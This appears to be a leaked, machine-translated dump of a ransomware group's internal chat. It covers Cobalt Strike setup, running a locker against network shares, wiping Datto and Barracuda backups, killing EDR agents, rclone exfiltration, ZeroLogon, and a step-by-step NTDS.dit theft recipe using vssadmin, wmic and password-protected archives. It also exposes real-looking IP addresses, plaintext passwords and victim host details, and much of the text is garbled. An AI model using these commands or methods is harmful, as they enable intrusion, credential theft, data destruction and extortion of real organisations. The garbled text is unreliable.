172.22.9.58data downloaded and put it together with the dll in the program, let's tighten it with a batkin and make it nice pinging your hostmix is disabled only on vorkhttp://nokuje.com
COBA://206.221.176.171:41772
yLCR4cOIzTpiXW5ioMJqAxSTqMX3WBvvOk7 if vmik is disabled twin fucks with shuffles``
name.dll, GetStdHandle
``Let's go like this, I'll give you dll and propsdashayte dll from any new coba@Air good morning raspingovyat there so gentlemen, how many dates downloaded ?2 I understand the inventory and disk, disk (2) on the logger things click?)) to remove from the center cue securely, which of the buttons to press?
1. Control Panel -> Internet Options -> Advanced (tab) -> Security ->
mark only "Use TLS 1.1" y "Use TLS 1.2
2. Control Panel -> Internet Options -> Security (tab) -> Trusted Sites -> Sites
put "add this website to the zone:" https://url_ip_site_gateway
```
this is how the problem was solveda I support it and do not take people from forums, it is easier to bring up your own rocket where the manuals within the confines of the clippings to give
the tooltip: do not work for 2 days - out, did not like it - out. normal guys easily pass such tests. i support the sandbox for newcomers should be done similarly))) myself and @fly remember) there's nothing in the archive except that there's nothing in the public. in fact, it could happen to anyone, remember how you were trained)) well, probably should not have given newcomers a case))) just keep on the net, let them take notes. the main thing is to let the newcomers know how to do it )) just let him take notes online)) and while you're looking at it even manually to install the msf on the vpstam it's been walking on the net and so on)) how come there's sorting hell moyd there are clearly our manuals
the ngrock and econnect are unlikely coincidences, i wonder if it's the same ngrock script that me and Tony wrote two years ago. where's yours from? :))) I'm in touch, write me when something appears. Hi. Happy New Year. Got it. )anyways sessions to reshoot kobyda no matter what I did not) I have 4.2 kobyda not downloaded) hi, have you anything to do? or all already downloaded? 1 minsheshady look it in the new roketesentinel not leak it without a "jump? "what is the trable to remote dump lsaas? about? buksuem (from March 24?) https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
if so, tell me how anyone set the sharkhrom master key when collecting passwords, how to shred the windup server before you give it to the trash?
I know about the nicks, if anyone needs to write, all sizes ..., my head is no longer thinking ... got it) thanks, let's try the fact 5-10 probably still add that the files will be old files that the locker does not touch udetob that is 260tb lock will be somewhere 26tb +-no, this locate at %10 just from the file-size 10 is the threads correctly understand? earlier just let in without increasing the flow, now I have to) gigabit 5 at us would kick - ok, 5 pieces like him will probably catch upInteresting what channel localka\nasa =) and how many disks? size nasa 600tb)) occupied 260tb400 ball, and what size is it all? 1-2tb? You probably just created a lot? ``Locker.exe -nomutex -size 10 -m net -p \\nas\papk1
``and then use \nas\papka1 /user:.``admin pass
in theory the mountain not on the letter too mountain +- the same folders in the population of pieces 400)from 1 pc (server) in 1 us...
mbr else try to attach ALL the balls on the 1 pc and he himself will see them and zamazhitEast NAS, a bunch of folders, will probably have to do a few PCs to full ball with the disks, how to make the lock as quickly as possible went only on the balls attached, the 1 pc prio 15-20 balls ?) If the remote computers will be disks with a summary size of 0 bytes? You can trim a folder or something not particularly necessary if we are talking about C $ Reformulate, what is the question? Hi all, how can you get the quickest possible lock on the balls only, if primaunchenno on each pc will be full disks?
i think you can do it in tobot, but i can't figure it out
exel is not doing it right?
F4lAsEz2nAcNgB3cpttvMAu1Jvya1vwDEGi4bJFzGxJK6npYKcBvTrWFX8FjNTDM
``it's also searchable with ost pst viewer
http://www.ostpstviewer.com/почта pst file?
Import it into your outlook and search) Guys, you need to do a keyword search in all the mail downloaded from the user, who has advice? @all better to buy a license for 20-30 bucks@all does anybody use kmsauto++ to activate windows? No, but there was a file with passwords somewhere in the classics.and how did you get the codes in ssh, were they default?I don't know if it worked in barracuda, but I'm not sure about synchronization, if it's going to wipe it in the cloud, is there an ssh? and how will you get into it? but it's possible to get into the hardware and wipe everything with ssh.
There's some kind of FS, can't remember the name right now, but there's software on githab that allows you to wipe everything in the command.Webadmin into the external domain https://auth.datto.com/loginи yes, there's a webadmin and it can be on a two-factor, like barracuda it's got redundancy set up in the cloud
barracuda has the same system, no option to delete from the cloud as such
but if you overwrite your backups on the stack, they should be deleted from the cloud as well, because there's synchronization there://invenioit.com/datto-backup/
see, there's a piece of hardware
aka backup server (physical), aka backup software, aka backup storages through the web panel ? datto also self barracuda backup encountered? with viam everything is cool, but with datto not so simple not the first and not the second time we run into datto what is your questionnea, was 2fa@all Datto backup someone gutted?
Has anyone used the FortiBrute that was written for us?
In the personal area please knock.cisco EDR hard stops the locker in the form of eexe and dll. But if you run the dll through PS and regsvr32.exe
If you run the dll through PS, regsvr32 exe, then the cisco is already starting to fart, and the locker will workooOne more time to run veeam.exe If you're talking about rd you do legitimate actions fuck itWho from under the carbon viam decrypted? @all once again to all
we have a ton of downloaded databases, LET ME have them, we will make bots out of them)))) searches the contents of all the docks in the ball via keywords or regularshttp://github.com/blacklanternsecurity/manspider
a very useful tool can be the same process explorertoolsa says it kills EDRs: //www.kitploit.com/2021/07/backstab-tool-to-kill-antimalware.html?m=1@all Urgent report who has these in operation!!!!
bobpoynter.com
silverspot.net
In PM with the current status on the case!!!
HgmX0sRHCAY56Yu0RJIA4Q2TfvAyFd9hSALE1KdKAQsNEi9oX1C4BFvC6ypWReeE
```
@all tell me whose it is plizsysadmins go to them, hash it out
print service on the print server no one will turn it off (unlike KD, for example)
and patches on the print server may not drop by so often, even when they will my main idea is to just the print server through it? hmm?
why does it not work with me =) why does it work only on the dk? does it work on the dk or wherever it is?
wn2wUb0N199FdCErCx2d881gwc3bzLriRTPLV2l1WZeA1hPMEAMSACRzSbPM9q1P
``````
Ns5WQ4hUEqxZRO4Ls1WW8wn8K95FKrkEKLxyjXjdwmjb0NpLosviDzWlNlarhNiY
```
and this? @alliche? and muzzle into it pour the second slidechnaya exactly, we did so, cops :) and all from a virtual machine ruberyprofit it cling to Deploy virtual machine take a dedicata allocated bullshit =) session cuts network proactive rephrase - when you connect a VPN falls off the external adapter
tymka not help, ngrok toorebota, anyone had a Fortica, that when you connect to a VPN can not get up a session on the VPN and within the network, too? how to solve this problem? so throw in the adminWho exit on the brute force? a couple of kerbs should runsubd with soaps means any database that contains email addressessubd with soaps means .ost or .pst file? @all please check the date on your cases, where there is a DBMS with soaps and write in the PM me the number, make them work further) who already do a color 2021 1675 ?@rozetka skim here here's also just looking for scripts to replace the work of sharpviewdobviously) now dovavlyuyut admin :) i want you to evaluate who itt what manu)? 500 strings almost!i want to know what the fuck is up with this manual? is there anybody there? i'll try to set up a free download, maybe it will work.burp suite you can use manual to configure if you also have tools will be great :) guys, did anyone work with webform brute force? need help breaking the admin which poppobuyishey creed) so you just do not have a creed, also access deny write I'm trying all this from the dc itself ``t3chnolog
the server itself is in the domaincontroller group like everyone else
```
if your target machine is in a domain - to bypass NLA you need to start a car in this domain get a trust contextNLA error hangs because you from an untrusted source try to get into the domain (i.e. from a group or vpn who are not in the target domain where the machine you need is?
winrm/wmic/schtask/psexec/rdravtorizationyou have all ports open vashchetashcha try it outentf through the DC and you through ipak address. i think this was the tie-in when i had this error. xfreerdp bypass[ ](https://stylebrooks.com/group/discussion?msg=Qwt32H77AjEyupgeY) xfreerdp yuzaytrss://blog.cobaltstrike.com/2015/07/22/winrm-is-my-remote-access-tool/ but it is rarely opened so it is unpopular as well as youzayut vmic and stask google commands5985 how to get it? https://prnt.sc/xrgh783389 not allowed by rp5985 - WinRM3389https://prnt.sc/xrfwu4вопрос how to pop in there canENIGMA
Status: Ativo
Sistema operacional: Windows
IP: 192.168.3.101
MAC: 78:E7:D1:CC:3C:88
Fabricante: Hewlett Packard
NetBIOS: HVC\ENIGMA
Usuário:
Tipo:
Data:
Comentários:
Serviço Detalhes
RDP Tunnel is Microsoft SChannel TLS: unknown service
Port 135 (TCP) Microsoft Windows RPC
Port 139 (TCP) Microsoft Windows netbios-ssn
Port 445 (TCP) Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Port 2179 (TCP)
Port 3050 (TCP) Firebird RDBMS Protocol version 10
Port 3389 (TCP) Tunnel is Microsoft SChannel TLS: unknown service
Port 5432 (TCP) PostgreSQL DB
Port 5985 (TCP) Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
Port 47001 (TCP) Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
Port 49152 (TCP)
Port 49153 (TCP)
Port 49154 (TCP)
Port 49155 (TCP)
Port 49156 (TCP)
Port 49157 (TCP)
Port 49163 (TCP)
|C:\Programdata
C:\SistemasHD
On ENIGMA 192.168.3.101 HVC Hewlett Packard 78:E7:D1:CC:3C:88 135, 139, 445
\\192.168.3.35\c$\SistemasHD
hostname=192.168.3.101
[DATABASE]
database=bd0240
[USUARIO]
username=EDUARDOR
codHospital=1gayz hi all, can anyone suggest something, the server is closed with backups, not by pehek not by explorer there by entering the folders is not included. the server itself in the domaincontroller group like all, in the DC no bans, most likely it locally inside the machine is covered, while there is a database, which works all clients in the network.and qubes os not felt? it is like a Band-Aid
try it once and like it agadas who's more comfortable
i'm just not very good with docker = )pull the script on the ensemble just in casesee what the server writes after you try to connectwmic logicaldisk get volumename,size,freeespace,caption,filesystem,drivetype,subscrirtionBoyce, how do you know how much weight the ball in the cob?This is the first time I've seen such an error....windup! java version "15.0.2" 2021-01-19data java seems to have been updatedcertin in thread "main" java.awt.HeadlessException:
No X11 DISPLAY variable was set,are you sure that you run it on the X it swearsstaraajavaGreetings all, a question on the new coba, according to the installation manual, when checking
```
"Check our profile, go to /root/cobalt
sudo ./c2lint domain.profile"
```
kicks out
```
Hook start
Found desired class: common/Authorization
Exception in thread "main" java.awt.HeadlessException:
No X11 DISPLAY variable was set,
but this program performed an operation which requires it.
at java.desktop/java.awt.GraphicsEnvironment.checkHeadless(GraphicsEnvironment.java:165)
at java.desktop/java.awt.Window.(Window.java:545)
At java.desktop/java.awt.Frame.(Frame.java:423)
At java.desktop/javax.swing.JFrame.(JFrame.java:224)
At aggressor.MultiFrame.(Unknown Source)
At aggressor.Aggressor.main(Unknown Source)
```
I've googled errors, i've installed all suggestions, and the result is the same: this error.
Suggest who faced with add more when not dbo but dmnu if it goes, it's obviously easier than the hands, yes) it's not hard talkkak how to do otherwise I hzya in a 3 query ddb handwritten, and the tables in the variables, it for each line will give out yep
but in the third query you would have to substitute two variables in three steps
database query
query the tables in the name ala %DB%.txt and there tables
and then polling from %DB% each row as %tables%from under cobalt kst mbmbl will either go or fuck it up, I don't know)``
@echo off
for /F %%i in (db.txt) do sqlcmd -S localhost -E -Q "USE %%i SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" >> tables.txt
``but try it this way, I do not know if it will go or not that's the question and the crutch should be invented instead of a couple of hours of routine substitute tables databaseskl you do not turn a query into a batinck that went to the server with the database, enabled, then purely 1-5 tables needed sdamil. everything. success. minutes for 20 or pvsh codekak it all in batinck turn the question is that I turned it by hand Tovibinu
```
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName
```
instead of %databasename% - a string from a file - you can do it through skl syntax, maybe not, googlea then you need to substitute the string from the file into skl query, one by one ``
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases; >> db.txt"
```
you get the list of databases as a file, delete unnecessary rows if you have a login and passwords can connect via sox through any toolzoo and very quickly browse the smirinado that he questioned all the databases for tables and a dozen rows from each table
yesterday i searched the server there were 30 databases and tables with all sorts of shit, it takes 300 clocks to poll each table
it should be avtmoatizirovat context let's say the correct made - through the scratch management studio or through slserv the list of databases, tables, the first 10 rows in each table so if you need it for authorization through the Codes can throw a simple batik or context uhu if it does not, you need to get involved and inject into the process sklserver, the session lift that is, what you need to unload the database and the tables you need sa login to the database, I want me to run a conditional batnick or unliner and it in response to me
DATABASE
tables
examples from the tables if you're going under the token then what questionnaire, I can only give you the questionnaire by hand, if you mean authorization through the Credentials we can write anything if there is a normal TK[ ](https://stylebrooks.com/group/discussion?msg=JbThAga47LKSwLJfu) and write a DB questionnaire? not to sit and drag DBs for a couple of hours, eh?
how's that? it works on the test machine, it doesn't on the network, then form the question in as much detail as possible) and it doesn't, i just don't understand why the code doesn't work) there's a fuckload of developers and more
but you need to tzpolzernyy)write the terms of reference is there anyone who knows c++ at a decent level? `` java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar $*
any problem with cilance lately? the session does not allow to raise or it can not remove? no panel, rdp no cilance without a pass through the panel removed with a reboot-some proven method is needed, no fear if you need to reboot who knows how to disable cilance and rapid7 agents? slice[ ](https://stylebrooks.com/group/discussion?msg=HbrmvvFLxZkD2sW9E) https://forum.exploit.in/topic/182703/?tab=comments#comment-1168697
))) judging by the correspondence log, the trance is getting pretty fucked up...the only thing i fucked up was my hashes and he fuckin' told me they were too fuckin' complicated
I ended up having them on my physical car in two hours instead of his hyper-duperferm
¶¶ Talked to both ¶¶
```
tranny and the cunt are having forum wars ``11tcp_bind_pipe```
Guys, and tell me another point, have rdp access to the machine, it is in the domain. I want to throw a coba, but no access to the Internet from the machine, I have user rights, and the other machines in the network Codes do not fit
```
guys, and tell me another point, have rdp access to the machine, it is in the domain. I want to fork the cob; but no access to the Internet from the machine, I have user rights, and the other machines in the network crescendos do not fitTobshabla with bothPublished: 6 minutes ago
TS. PMs in the last couple of years in my opinion the most stabile server, it's all fun
and the server as I understand it is not only me) I see
another "guru of the underground" looking for a student reseller ironkryptomaniak who made a bid ? mafia in da taunahahahsa deanon miki
I'll buy sabj, dough get after verification of information from my deposit by transferring to my own.
The time for checking is 7 days.
Needed:
Name, date of birth, city of birth
Desirable:
Scan of passport, any pre-information, any checks on the registration or real estate
2Mika, you fucked me up bitch, because of you, you bitch, yesterday the deal fell through, and not like your fucking 100-dollar deals, but a big fucking deal. You're fucked, I think they'll find you for 100k, if they don't find you, I'll look elsewhere, but you fucked me up so bad I wanted to find a person from the web for the first time in my life in real life
``what's the big deal,``
the guy's a mid-level sysadmin $100k at the most they give for deanon. they're paying 100k these days, these reverberators are engineers in stockings and cat ears, he's technically talentless, i had the misfortune to talk to him, he's miserable, and it's too bad he's got no fucking reputation, because he sold his rep account. what is that tranny doing there again?i don't know what the hell is going on there, i can't help but wonder if there's a problem with thesecure server or if it's just me?
https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265почему when i try to connect over webrdp on sonic sma, i get auto-login to netextender's wpn? when i scan the pool through ais it writes dnshostnamewhat ways can i learn fdqn if nslookup does not see,and the domain to connect to the wpn is LocalDomain? in the cobalt channel where the new keith where?) thank you in continuation of exchenge
https://github.com/jsdryan/CVE-2021-26855
googletranslate from chinese still translates
and here's more from this morning.
https://github.com/alt3kx/CVE-2021-26855_PoCCodeocta0dayinbiz@all those trying to get back in after the work is done - try this script if it is valid and works as expected - it was released on the forum7 hours agohttp://github.com/Udyz/CVE-2021-26855
CVE-2021-26855 Brute Force EMail Exchange ServerA where is it?
Result
``https://dyncheck.com/scan/id/e9475dcf0a3efd9deaf3aa07a6147b5c
``Chuckhttps://github.com/KaLendsi/CVE-2021-1732-ЕхрІоітдобавьте me
not marked who has this case@all cairncapital.com whose channel? @all have cases to work, write to who do not do I recommend nmap zenmap install on the grandfather and scan the locale in the scanner settings put rdp ftp http? https://prnt.sc/10gxp3zвот so he sees the network, one iphttp://prnt.sc/10gxqmsdata on the grandfather session you raise the iphone?even if I have an ip scanner, what's the best way to scan the network, see the names of PCs, domains, etc., without having a point of entryroute print, like it should display the ip network, if I am not mistaken here is yes, there is an account, but for it the network, how to find?
adfind -h -u domain\user -up password -subnets -f (objectCategory=subnet) > subnets.txt
``So get the info.``
you have domain creeds from the vpn have da no, well, I'm from scratch connected and do not know what's on the network if the AD is not spelled out - the input diap + where the root servers are to startsabnets assemble through the adfindbytes in AD not all sabas are not specifiedpingani all hosts and ipam make diapykaee have options to scan the network behind the vpn? @t3chnolog thanks for the tip, everything came out can take a dedic, plug it into the VPN, and on the dedic to put vBox and shared internet with the dedic by http type.and there cobalt start pinging the routing at all?the session was not raised from under the vpn?session either do not raise the session at all, or look for a segment that is not covered by proaktivkoy (you may not find) if your session drops, the VPN segment (and most likely all network segments) under a hard network proaktivkoytimver on the dedic, or enidesk, or ngrok@allGod are solutions to bypass the following problem when you start a VPN `(forti) on the dedicates stops tapping session, the VPN is started along with the breakage of rpd, I used to be that when you start up broke the rpd to the dedic but the session continued tapping and solved all through socket. How to be in cases when it stops knocking? How else can I skip ?[ ](https://stylebrooks.com/group/general?msg=D5RMECmkEu2RzsXWZ) in case network activity is monitored not to overload the channel?[ ](https://stylebrooks.com/group/general?msg=8XN3B5vxCybHR9BDv) --bwlimit 5M
limit download speed in 5 megabits, handy flag to pass "below the radar" )guys, salaam, has anyone raised rights through dll hijacking? @all c0ntiteam41@protonmail.com whose email?[ ](https://stylebrooks.com/group/general?msg=cfo3pscHwzhwYYWAj) ``
https://www.sendspace.com/file/n7n47e
If anybody didn't know, you can filter files by date, for example --max-age option lets you specify how old files should NOT be uploaded
```
rclone.exe copy --max-age 3y "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P
```
This command will only load files not older than 2018, i.e. 2018-2021
more details - https://rclone.org/filtering/AdminSDHolder has anyone run it? it is the tricky implementation of the connection itself i have tried reverse sox implementations on verichel
firewalls cut the tunnel on tsp sockets autorun holdsNo about my rath I told you[ ](https://stylebrooks.com/group/general?msg=zhoevopRHvuQTE556) somewhere on the damag wrote about plink
```
https://gist.github.com/moshekaplan/425c2a263c3e8a0b080d
```
not really got into it myself, tunnel but kinda sticks the averamische throw bro
The linux is forty-two mb*, 40-50 min will be uploaded to sendspace, as soon as it will upload I will send you the link
pass: bhju7tgh does anybody have a video of the ms17 manual? i'm not rooting for coba, just overall empire and other frameworks not only save time but also increase the possibilities to do it with coba-like software, a lot of moves in 2 clicks are done technically, but fuck the effort
or you can use rpd and get passes in a minute
you need to look at the situation there is no universal solutionindividual for the case is all in a normal avera claudnom you in 5 seconds will shoot and write out :) well, for a certain stage of development is necessaryhttp://www.cyberark.coba would have hung quietly hash is bad or hash pull on the folders, and on the computer mimic smell you do the same way they smellkakoy through smbclient aplolyadet stylak for example a software on the password passes from the clauds in the browser or in softet to trace the admins? why?What about coba, keylogger and other utilities, without coba it would be impossible to legally track admins, but not if you use a cleartext pass to move legitimate additems in the events, it would also need to be cleaned and hope that it will not be detected) starkillerethese software have including cobalt pailoada empire gui appeared and empiretoka in any case, any software to clean at home many coadic still uzuyuta che impaket not palpai?i want to find a solution that will drop sox4/5 into local network to work in 90% of networks and impacket to mess with networks :) found it. I'll check rantime also present in empire modules https://github.com/BC-SECURITY/Empire/blob/master/changelog not a bad alternative to coba by the way, there is a built-in module obfuscatorhttp://github.the module is not a bad alternative to cob, by the way, there is a builtin module refactorhttp://jpillora/chisel/hellaisenu in the releases of EXE? on dinchek can you refactor? AB all similar softwareshttp://github.com/jpillora/chiselchisel@all who deployed cob in a localized target? what solutions do you have?
ssh is possible (in the process of release)
what else?
ideally FUD / lightweight software
even without autorun yet
any ideas / thoughts / solutions please
Thank you.
there was no such a problem before and you can access other servers through a proxy? ````
[*] Will use existing X509 certificate and keystore (for SSL)
[+] I see you're into threat replication. /root/Cobalt/xxxx.profile loaded.
[+] Team server is up on 48765
[*] SHA256 hash of SSL cert is: c9956501328161d839cd78b0d1ebf1cea6da5691d302ca0333bfc8acd4d49020
[!] Profile variant 'variant_1' does not exist. Degrading to normal profile state.
[*] Web Server will use user-specified SSL certifcate
[+] Listener: main-list started!
````
all ok on the server````
[!] Trapped java.net.SocketTimeoutException during client connect [dialog action: Connect]: Read timed out
````
tell me what could be causing this - does not want to log into the serverhttp://reconshell.com/cve-2021-21972-vcenter-rce-vulnerability-analysis/
check out this beauty@all forum/index.php?topic=47.0
a collection of tv channels and groups you may find useful or interesting@all those who have waited for more cases, write back, there are fresh dumps I do not always insert all the code, for example sharefinder
i offered it as an alternative)) you'd better just import the code into pvsh without dropping it on the disk
i suggested this as an alternative) psst is better to just import the code into a psst without dropping it on the disk - it may be very unpleasant if you catch a detection right before the lock) nimbus2000 and one more thing, because i heard from alta that someone had a psst script that doesn't start, this also applies to other ps1 scripts and those situations when the serversack without powershell isE
Example: we have a script
```
examplescript.ps1
```
The manual on the githab specifies to run it as a
```
.\examplescript.ps1
```
and then the command
```
Invoke-ExampleScript -argument
```
run it and you get an error that there is no commandlet, this is because the commands are not pulled up so (I have not worked in any case)
the solution is this: change the file extension from .ps1 to .psm1 - you get a plugin for the portshell
Open normal powershell
write
```
Import-Module .\examplescript.psm1
```
With the next command we call the function
```
Invoke-ExampleScript -argument
```
we get a working script:thumbsup:Guys, who will be knocking filesilla from the accesses we got with SessionGopher to the servers.
specify the protocol explicitly, because the port is not explicit, it will be specified in the output, for example, here is the output of my sessiongopher:
```
"COHLAPTOP75\CSoh", "Shopbop - Development", "z3M>uE/B", "sftp.amazonsedi.com", "2PD11LSYEWJ90", "Use SFTP", "2222"
```
if you just enter in the field host - sftp.amazonsedi.com you will not get connected because the port is not ccp 22 but 2222, in the host you need to specify the protocol explicitly that is sftp://sftp.amazonsedi.com
if it says ``.
Use FTP over TLS if available", "21"
```
then specify ftps://hostname
etc., here is a reminder just in case:
```
ftp:// - For normal ftp connection
sftp:// - ssh ftp connection
ftps:// - ftp over ssh (implicit)
ftpes:// - ftp over ssh (explicit)
``@all are there anyone without cases?
@cybercat threw in pm.morning to those who do not sleep, I remember throwing a batik, which stops all services that can interfere with the lock, throw please - urgently need and can not findhttp://www.red-gate.com/products/sql-development/sql-compare/
with this utility you can not look through the whole sql.bak, but restore a separate table from the database and see it@Air fill it in here
into the generalinsulation.com folder
and let me know how it's done
```
172.82.162.66
admin
3cT26dDrDCwS
ftp 21 port
Sometimes there is a hello who is alive? with the context thinly but cranked up) it's like ms17 on win2008buy a token somedomain\usermake_token domain/user times I took a harddisk on which napn was pulled up and went, but did not start then domain account took yesterday received a similar errorgetuid show[*] Tasked beacon to run .NET program: SharpZeroLogon.exe hopo-dc2.holly.local false check
[+] host called home, sent: 114807 bytes
[+] received output:
Performing authentication attempts...
Unable to complete server challenge. Possible invalid name or network issues? beacon> execute-assembly C:\soft\SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch
[*] Tasked beacon to run .NET program: SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch
[+] host called home, sent: 114279 bytes
[+] received output:
Patching failedI had such an output I need time to test it I already sent it for rebuild We'll correct it and add to the toolchain a binary in the form of a dllcheck better sharpzerologon it is more reliable but in general we have a whip access so you can use sharpzeroLogon in the case recently was literally bumped yesterday
i can't help but wonder if the problem is solved and i don't give a fuck if it's working or not, but in the log above you can see there are a couple of errors and it doesn't seem to be working either, it's about zero.the zerologon's buildcheck doesn't work for me, it's better to dotnet in the toolchain and pavnin the binary should "crawl" and then say vulnerable or nottoday i'll throw someone check zerologon was able to run? how should the result look?
i can get it in testing, i can get the errors right here, but PLEASE leave one message so i don't get confused and there won't be messy@all:handshake:utilities bundle with the corresponding .cna scripts.
the documentation will be full within a couple days in pmsamopis ) if you use public obfuscator can give you a link to keep the copy number in the obfuscated command
cmd /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\\ & copy \?GGLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\\\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\
```
who has experience in obfuscating commands in cmd? i agree, thanks a lot. interesting way, thanks for the manuscript) if you have a problem with dumping ntds and dropping them from the net, try this way
he can burn only the fact of leaking data from the CD, and to analyze what exactly you have without knowing the password from the archive can not be thrown on the forum pokinutnost of this method is that we actually do not dump anything, we just take and pump ntds
not to be spotted when we dump the ntds we pack it into a password protected archive
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt"
```
query the shadows list, there's a date on it, check if it's recent
almost for sure they're already there, if not we'll do it ourselves
```
net start Volume Shadow Copy
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
```
then in shadow copy listing find most recent one
Shadow Copy Volume: \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55
Accordingly we need the copy number for the following command
```
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\"GGLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\\?
```
ntds.dit / security / system files should fall into c:\temp\log\
take the portable console 7z and pack it in the archive with the password
```
7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD
```
Download the patented archive to yourself, if you get an error (file is corrupted) when you decrypt the ntds file, do the following
```
Esentutl /p C:\log\ntds.dit
``If it's not too hard = )on the forum please = )for those who are too lazy to read I'll compile it``.
https://www.c0d3xpl0it.com/2016/10/dumping-ntdsdit-file-from-active-directory.html
```
here's the article I'll make a manual for removing ntds for everyone
I've never seen anything better, I made it myself based on what comrade Tony gave me
i finally found out i'm not the only one who's so fucking smart and after i did it i found this article from 2016 where the way 1 in 1 is described) i used msf to unlock it not so long ago but it was crooked. what other methods are used to unlock ntds? i assume the majority dumps via ntdsutil?
[x]error at JetAttachDatabase()
[x]can not load database: JET_errDatabaseDirtyShutdown, Database was not shut down cleanly. Recovery must first be run to properly complete database operations for the previous shutdown.
```
mb who managed to fix it? decrypt I can not, says the file is corrupted or something like thatanyone ntds dump damagi when removed through vssadmin create shadow? give the terms of reference that should write - will doAnyone here specializes in writing scripts for cobalt? need a little advice[ ] (https://stylebrooks.com/group/discussion?msg=P5HmD7mrt3JuN3i2k) or lazy)[ ] (https://stylebrooks.com/group/discussion?msg=QZCukbRTwecCABEp5) spared 100 bucks to regu on eksper (found on the expanse of the site.
"Dutch police registered on the forum of three letters and left a warning for all users. "here does not coo such a method, hidden files on the admin's machine do not even show them, although in fact through PS -hidden 2 files hangs a folder with the entire
then display hidden files
Complit7zSalam, guys
There is a question, anyone know how to pick up files with read-only access?
I'm talking specifically about the user keys in %APPDATA%\Microsoft\Protect\\.
To then pull the master key off of them[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=fqqqCgczHPnPxjZgq) how? I already wrote the server to me in pm I'll give it to the hoster let them deal with it. Is it working today?
``Wait, are you making progress?`` I know, me too) I'll give it to you today without anything else, I'll give you the server metasploit soon,`` 192.111.154.74
``````172.98.197.98
``I've got nothing) the dead disk where the msf was and the coba too``` 172.98.197.98
I``ve got nothing ! It's me without everything)``192.111.145.218
``Dedeepic is mine[ ](https://stylebrooks.com/group/cteam?msg=sxGizW3CZvz4WkgN7) )), but I got dumb under the msf server )oxmetasploit )I without dedik and mestamoy dedik
```192.111.149.26```
methinks what is it?) I just got the badge yesterday.
Guys who do not have dedicates and meth sign here those who have dedicates and ipses
``You have an account there....like everyone has an account...`` Do you have an account there...like естьԁг.hash@exploit.im...
200 usd per hash
3700@jabb.im
it's up to you
All hello, who can help with the ntlm hash brute force? if so - ldap queries through sox work you have to let the bot? maybe if not panicking will put the triggerPlease tell me, sentinel addfind panicking, no? everything worked, thank you
``beacon> shell nslookup 10.30.0.1
``Do nslookup dns server or something else? nmap? domain name is needed to get adfind off ``Ethernet adapter Ethernet 4:
Connection-specific DNS Suffix :
Description . . . . . . Fortinet SSL VPN Virtual Ethernet Adapter.
Physical Address. . . . 00-09-0F-AA-00-01.
DHCP Enabled . . . . No
Autoconfiguration Enabled . .: Yes
Link-local IPv6 Address . : fe80::6810:5a5e:bc36:b7b7%5(Preferred)
IPv4 Address. . . . . .: 10.212.164.25(Preferred)
Subnet Mask . . . : 255.255.255.255
Default Gateway . . . . :
DHCPv6 IAID . . . . . : 83888399
DHCPv6 Client DUID . . . . : 00-01-00-01-28-5A-D0-32-00-15-5D-59-1A-00
DNS Servers . . . . . : 10.30.0.2
10.30.0.1
NetBIOS over Tcpip. . . . .: Enabled
``how do you find the domain?)I have not encountered, but the text is something like either the path to the key file is not correct, or in the single config file it is not correctly entered into the hour and a halfPreviously bilds will update todayokayt slam clients date avazioni start preparing to merge databrandon fury ayr and flintintprevolutionary:zany_face:hello there guys all, here i am back, modem problems were, i'm back on lineLOGIN
kennethgevansecj_yah
PASSWORD
e9a2c5574445.91.11.22:300012.56.115.39:3000145.91.11.22:30001
LOGIN
kennethgevansecj_yah
PASSWORD
e9a2c55744
TYPE
HTTP(S)
AUTHORIZATION
by login/password62.96.194.146\\10.153.96.27\e$\MG-Mixedmayfair-grp\d_mg1201aa 22e?27%mQ1ut
